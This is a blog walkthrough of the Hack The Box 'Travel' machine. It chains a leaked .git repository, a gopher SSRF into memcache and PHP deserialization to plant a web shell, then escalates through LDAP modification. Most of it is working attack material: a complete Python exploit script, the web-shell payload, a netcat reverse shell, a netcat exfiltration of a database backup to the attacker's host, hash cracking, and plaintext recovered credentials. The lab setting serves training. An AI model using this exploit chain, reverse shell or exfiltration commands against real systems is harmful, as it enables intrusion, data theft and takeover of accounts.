TRAVEL WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 19:52 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating Ping Scan at 19:52
    Scanning 10.10.10.189 [4 ports]
    Completed Ping Scan at 19:52, 0.65s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 19:52
    Scanning ldap.travel.htb (10.10.10.189) [1000 ports]
    Discovered open port 22/tcp on 10.10.10.189
    Discovered open port 80/tcp on 10.10.10.189
    Discovered open port 443/tcp on 10.10.10.189
    Completed SYN Stealth Scan at 19:52, 3.76s elapsed (1000 total ports)
    Initiating Service scan at 19:52
    Scanning 3 services on ldap.travel.htb (10.10.10.189)
    Completed Service scan at 19:52, 14.28s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against ldap.travel.htb (10.10.10.189)
    Retrying OS detection (try #2) against ldap.travel.htb (10.10.10.189)
    Retrying OS detection (try #3) against ldap.travel.htb (10.10.10.189)
    Retrying OS detection (try #4) against ldap.travel.htb (10.10.10.189)
    Retrying OS detection (try #5) against ldap.travel.htb (10.10.10.189)
    Initiating Traceroute at 19:52
    Completed Traceroute at 19:52, 0.56s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 19:52
    Completed Parallel DNS resolution of 2 hosts. at 19:52, 0.61s elapsed
    NSE: Script scanning 10.10.10.189.
    Initiating NSE at 19:52
    Completed NSE at 19:53, 14.29s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 3.08s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Nmap scan report for ldap.travel.htb (10.10.10.189)
    Host is up (0.30s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp  open  http     nginx 1.17.6
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.17.6
    |_http-title: Travel.HTB
    443/tcp open  ssl/http nginx 1.17.6
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.17.6
    |_http-title: Travel.HTB - SSL coming soon.
    | ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
    | Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
    | Issuer: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-04-23T19:24:29
    | Not valid after:  2030-04-21T19:24:29
    | MD5:   ef0a a4c1 fbad 1ac4 d160 58e3 beac 9698
    |_SHA-1: 0170 7c30 db3e 2a93 cda7 7bbe 8a8b 7777 5bcd 0498
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=7/5%OT=22%CT=1%CU=35636%PV=Y%DS=2%DC=T%G=Y%TM=5F01E24C
    OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F5%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)ECN(R
    OS:=N)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF
    OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
    OS:%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
    OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%
    OS:CD=S)

    Uptime guess: 34.417 days (since Mon Jun  1 09:52:43 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=245 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 111/tcp)
    HOP RTT       ADDRESS
    1   555.47 ms 10.10.14.1
    2   555.59 ms ldap.travel.htb (10.10.10.189)

    NSE: Script Post-scanning.
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 55.62 seconds
            Raw packets sent: 1305 (64.070KB) | Rcvd: 1185 (50.866KB)

ENUMERATION

In nmap scans we know that we have 2 other domains:

  • travel.htb
  • blog.travel.htb
  • blog-dev.travel.htb

First add these domains in /etc/hosts

TRAVEL.HTB

BLOG.TRAVEL.HTB

BLOG-DEV.TRAVEL.HTB

So here I fuzzed every domain but got interesting ones from blog-dev.travel.htb

    ┌─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #wfuzz -u http://blog-dev.travel.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************

    Target: http://blog-dev.travel.htb/FUZZ
    Total requests: 4614

    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                               
    ===================================================================

    000000001:   403        7 L      9 W      154 Ch      ""                                                                    
    000000009:   200        1 L      2 W      23 Ch       ".git/HEAD"                                                           
    000000090:   404        7 L      11 W     154 Ch      "_tmp"                                                                ^C
    Finishing pending requests...

So here we know that we have to use git method to get all files

So i useed a tool here gitdumper : LINK

https://github.com/internetwache/GitTools

    ┌─[root@liquid]─[~/Desktop/HTB/travelC/GitTools/Dumper]
    └──╼ #./gitdumper.sh http://blog-dev.travel.htb/.git/ ../../blog.travel.htb
    ###########
    # GitDumper is part of https://github.com/internetwache/GitTools
    #
    # Developed and maintained by @gehaxelt from @internetwache
    #
    # Use at your own risk. Usage might be illegal in certain circumstances. 
    # Only for educational purposes!
    ###########


    [*] Destination folder does not exist
    [+] Creating ../../blog.travel.htb/.git/
    [+] Downloaded: HEAD
    [-] Downloaded: objects/info/packs
    [+] Downloaded: description
    [+] Downloaded: config
    [+] Downloaded: COMMIT_EDITMSG
    [+] Downloaded: index
    [-] Downloaded: packed-refs
    [+] Downloaded: refs/heads/master
    [-] Downloaded: refs/remotes/origin/HEAD
    [-] Downloaded: refs/stash
    [+] Downloaded: logs/HEAD
    [+] Downloaded: logs/refs/heads/master
    [-] Downloaded: logs/refs/remotes/origin/HEAD
    [-] Downloaded: info/refs
    [+] Downloaded: info/exclude
    [-] Downloaded: /refs/wip/index/refs/heads/master
    [-] Downloaded: /refs/wip/wtree/refs/heads/master
    [+] Downloaded: objects/03/13850ae948d71767aff2cc8cc0f87a0feeef63
    [-] Downloaded: objects/00/00000000000000000000000000000000000000
    [+] Downloaded: objects/b0/2b083f68102c4d62c49ed3c99ccbb31632ae9f
    [+] Downloaded: objects/ed/116c7c7c51645f1e8a403bcec44873f74208e9
    [+] Downloaded: objects/2b/1869f5a2d50f0ede787af91b3ff376efb7b039
    [+] Downloaded: objects/30/b6f36ec80e8bc96451e47c49597fdd64cee2da
    ┌─[root@liquid]─[~/Desktop/HTB/travelC/GitTools/Dumper]
    └──╼ #cd ../../

Here we have downloaded evry file from git :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb/.git]
    └──╼ #cat index 
    DIRC^���\�^���\�
    \:�����l||Qd_�@;��Hs��	README.md^���-�rc^���-�rc
    \<����
        �+i����xz��vﷰ9rss_template.php^�|�UH]^�I�;]�X
    \=����k0��n���dQ�|IY�d���
                            template.phpTREE3 0

It looks like that we have some files deleted which need to be recover

So to that we simply need to use a git command

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
    └──╼ #git restore .
    ┌─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
    └──╼ #ls
    README.md  rss_template.php  template.php

Here we have these 2 files which we need to analyse :

Things we came to know from these files are:

Their is memcache available

$simplepie->set_cache_location(‘memcache://127.0.0.1:11211/?timeout=60&prefix=xct_’);

Their is get parameter

    function url_get_contents ($url) {
        $url = safe($url);
        $url = escapeshellarg($url);
        $pl = "curl ".$url;
        $output = shell_exec($pl);
        return $output;
    }

Their is directory where file is present and this directly looks like PHP serialization

    private function init(string $file, string $data)
    {    	
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }
}

This is place where get parameter would work

 	$url = $_SERVER['QUERY_STRING'];
	if(strpos($url, "custom_feed_url") !== false){
		$tmp = (explode("=", $url)); 	

So here we know that their is url parameter in custom_feed_url dir where it could help to get us shell

So when we visit this url :

http://blog.travel.htb/awesome-rss/?custom_feed_url=10.10.14.12

We get response in such format :

    ┌─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
    └──╼ #python -m SimpleHTTPServer 80
    Serving HTTP on 0.0.0.0 port 80 ...
    10.10.10.189 - - [05/Jul/2020 22:03:03] "GET / HTTP/1.1" 200 -
    10.10.10.189 - - [05/Jul/2020 22:03:04] "GET /? HTTP/1.1" 200 -

now we need to use memcache , php des. , and SSRF to get rev shell

So to do that we have tool called gopher

WHAT WE ARE GOING TO DO TO GET REV SHELL:

So we will generate payload using gopher through which we can execute commands then we will triger that payload using above url parameter. After which we will be going to that file where our payload is stored and will be executing shell commands

First we will try out gopher without payload and remember to change 127.0.0.1 to 127.00.0.1 because simple local host will give you error as we have seen in above template file

    ┌─[root@liquid]─[~/Desktop/HTB/travelC/Gopherus]
    └──╼ #python gopherus.py --exploit phpmemcache


    ________              .__
    /  _____/  ____ ______ |  |__   ___________ __ __  ______
    /   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
    \    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
    \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
            \/       |__|        \/     \/                 \/

            author: $_SpyD3r_$


    This is usable when you know Class and Variable name used by user

    Give serialization payload
    example: O:5:"Hello":0:{}   : O:5:"Hello":0:{}

    Your gopher link is ready to do SSRF : 

    gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2016%0d%0aO:5:%22Hello%22:0:%7B%7D%0d%0a

    After everything done, you can delete memcached item by using this payload: 

    gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a

    -----------Made-by-SpyD3r-----------

Here we can see that we have succesfully echo hello in page

So now we need to generate a payload which will store php shell executing cmd script in file and then it will save that file in log directory

So To do that we will have payload which looks like :

O:14:”TemplateHelper”:2:{s:4:”file”;s:’+str(len(file))+’:”‘+file+'”;s:4:”data”;s:31:”<?php system($_REQUEST[“cmd”]);”;}

What this payload is doing is that it is going to store php script in given file. Here file is named as liquid.php with php extension

But if you see that gopher generates spider text something in its payload whereas we need xct_4e5612ba079c530a6b1f148c0b352241 over their so tp do that we will have script like this

Whole payload looks like this :

CODE :

‘O:14:”TemplateHelper”:2:{s:4:”file”;s:’+str(len(file))+’:”‘+file+'”;s:4:”data”;s:31:”<?php system($_REQUEST[“cmd”]);”;}’

Here we are adding xct part in front of this code

payload = “%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 ” + str(len(code)) + “%0d%0a” + code + “%0d%0a”

Here we are URL encoding this code

encodedpayload = urllib.quote_plus(payload).replace(“+”,”%20″).replace(“%2F”,”/”).replace(“%25″,”%”).replace(“%3A”,”:”)

Here we are adding gopher url in front of that encoded url:

return “gopher://127.00.0.1:11211/” + encodedpayload

So whole script to do that is this:


    import requests
    import urllib

    LHOST="10.10.14.12"
    file = "liquid.php"
    url = "http://blog.travel.htb/"
    def payload ():
        code = 'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'
        #md5(md5("http://www.travel.htb/newsfeed/customfeed.xml%22):%22spc%22) = 4e5612ba079c530a6b1f148c0b352241
        payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" +  code + "%0d%0a"
        encodedpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
        return "gopher://127.00.0.1:11211/" + encodedpayload

    payload = payload()
    print "[+]payload is=:  " + payload
    print "[+] Requesting using ssrf in phpmemcache"

    ssrf_url = url+"awesome-rss/?debug=yes&custom_feed_url="+payload
    print ssrf_url
    r = requests.get(ssrf_url)

    print "[+] Its time for deserialization"
    r = requests.get(url+"awesome-rss/")
    payload_url = url + "wp-content/themes/twentytwenty/logs/"+file
    print payload_url
    while True:
        print payload_url
        r = requests.get(payload_url)
        print(r.status_code)
        if r.status_code == 200:
            break;

    print "[+] You are ready to go"
    print "[+] Run commands on web shell now"

After running thisb script just go to the given URL to execute command:

GETTING LOW PRIV SHELL

So after executing simple command : nc 10.10.14.12 9001 -e /bin/bash

You will get shell as this

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #nc -lnvp 9001
    listening on [any] 9001 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.189] 57608
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    pwd
    /var/www/html/wp-content/themes/twentytwenty/logs

So here we have a file in /opt/wordpress/ folder which looks more suspicious.

Transfer that file to your own machine.

VICTIMS MACHINE

    backup-13-04-2020.sql
    nc 10.10.14.12 9003 < backup-13-04-2020.sql

ATTACKERS MACHINE

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #nc -lnvp 9003 > backup-13-04-2020.sql
    listening on [any] 9003 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.189] 40198

After checking these files i got 2 hashes from this from last lines which I Passed to hashes.txt and run them against hashcat

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #hashcat -m 400 -a 0 hash ../../THM/Wordlists/rockyou.txt --force
    hashcat (v5.1.0) starting...

    <---->


    $P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser   
    Approaching final keyspace - workload adjusted.  

                                                    
    Session..........: hashcat
    Status...........: Exhausted
    Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
    Hash.Target......: hash
    Time.Started.....: Sun Jul  5 20:58:28 2020 (1 hour, 0 mins)
    Time.Estimated...: Sun Jul  5 21:58:44 2020 (0 secs)
    Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:     4170 H/s (4.98ms) @ Accel:512 Loops:128 Thr:1 Vec:8
    Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
    Progress.........: 28688768/28688768 (100.00%)
    Rejected.........: 0/28688768 (0.00%)
    Restore.Point....: 14344384/14344384 (100.00%)
    Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:8064-8192
    Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]

    Started: Sun Jul  5 20:58:24 2020
    Stopped: Sun Jul  5 21:58:44 2020

lynik-admin : 1stepcloser

SSH LOGIN

    ┌─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #ssh lynik-admin@10.10.10.189
    lynik-admin@10.10.10.189's password: 
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

    System information as of Sun 05 Jul 2020 05:12:38 PM UTC

    System load:                      0.01
    Usage of /:                       46.5% of 15.68GB
    Memory usage:                     12%
    Swap usage:                       0%
    Processes:                        203
    Users logged in:                  0
    IPv4 address for br-836575a2ebbb: 172.20.0.1
    IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
    IPv4 address for docker0:         172.17.0.1
    IPv4 address for eth0:            10.10.10.189

    Last login: Sun Jul  5 15:35:41 2020 from 10.10.14.12
    lynik-admin@travel:~$ id
    uid=1001(lynik-admin) gid=1001(lynik-admin) groups=1001(lynik-admin)
    lynik-admin@travel:~$ ls
    user.txt
    lynik-admin@travel:~$ cat user.txt 
    0b08xxxxxxxxxxxxxxxxxxxx5292af9
    lynik-admin@travel:~$ 

Here we go with user flag

After enumerating I saw file mainly related to ldap So I went for more enumeration for ldap and got these files :

    -rw-r--r-- 1 lynik-admin lynik-admin   82 Apr 23 19:35 .ldaprc
    -rw------- 1 lynik-admin lynik-admin  861 Apr 23 19:35 .viminfo

So in these files I got BINDPW : Theroadlesstraveled
So I ran this command to get users on ldap server:
ldapsearch -x -D “cn=lynik-admin,dc=travel,dc=htb” -w Theroadlesstraveled
So here I know that i am admin of ldap so i can add modify users from ldap
So just create a small ldif file where we will be modifying commmands for user and giving it access equal to root

liquid.ldif

    dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
    changetype: modify
    replace: homeDirectory
    homeDirectory: /root
    -
    add: objectClass
    objectClass: ldapPublicKey
    -
    add: sshPublicKey
    sshPublicKey:  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDgs99wAYJpE1eza90oIKZOe0TmcPXH4bzeiHArtwwbHJZFOWKLY15GO2L5s9JAiVlhn/VWEMLYM9QR+0kh4FPQXHDdb8eCtXfI6nkDIzcou0Hs3kAjpMUSgPuRhBGQcWs9o0gvsZ6kVGTZd9m0b4aXAvXa3gzxxxGJ5MCHKnj5DsKv/Xjr0/ooF6GOoQXMeRHE9KjgQNGSkjpkVcZlyMMAF1c/FcnB0q1fxnfimKGnrq4DA/a0jZN3Raj8yRIImaF7FppgGyNVc6UrvOt7D9DHg2f2eGUU/bFW5Clvcrkg3UIpdYqLMHMqknD9o8PshSiMsiS5s/8dwh3/6amM5YhMgeyoOBhJCIy8RwekI7ik014w8KeKPkwCJ6BgHUQ0mN0oftbO/aj7c38tI04BySM2zbLpVs+TSvs74qPzAI1iDcqCGWijMQJptLVHkqbYO9g4wudVo7ukcCZf2iDqS+vZEwSuae3EknGXbv0v5u4NdmAp6fyYWmrsm58FW2Ba6qk= root@liquid
    -
    replace: userPassword
    userPassword: liquid
    -
    replace: gidNumber
    gidNumber: 27

Here we will be changing user johnny access from low to root by allocating :

  • HOME (to give everything whatever root has access to)
  • GID 27 (to add this user in sudo group)
  • USERPASSWORD (to change password of user)
  • SSHPUBLICKEY (too add ssh publick key to authen. with our private key)

Here You have to generate SSH key in your own machine without password for better understanding and use public key in above script

Now lets run this command :

    lynik-admin@travel:~$ ldapmodify -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f liquid.ldif 
    modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

    lynik-admin@travel:~$ 

After that run this command on your machine

    ┌─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #chmod 600 id_rsa
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
    └──╼ #ssh -i id_rsa johnny@10.10.10.189
    Creating directory '/home@TRAVEL/johnny'.
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

    System information as of Sun 05 Jul 2020 05:24:46 PM UTC

    System load:                      0.0
    Usage of /:                       46.5% of 15.68GB
    Memory usage:                     13%
    Swap usage:                       0%
    Processes:                        205
    Users logged in:                  1
    IPv4 address for br-836575a2ebbb: 172.20.0.1
    IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
    IPv4 address for docker0:         172.17.0.1
    IPv4 address for eth0:            10.10.10.189


    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    Last login: Sun Jul  5 16:05:06 2020 from 10.10.14.12
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.

    johnny@travel:~$ sudo whoami
    [sudo] password for johnny: 
    root
    johnny@travel:~$ sudo cat /root/root.txt
    81abxxxxxxxxxxxxxxxxxxxx6c3c8
    johnny@travel:~$ 

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: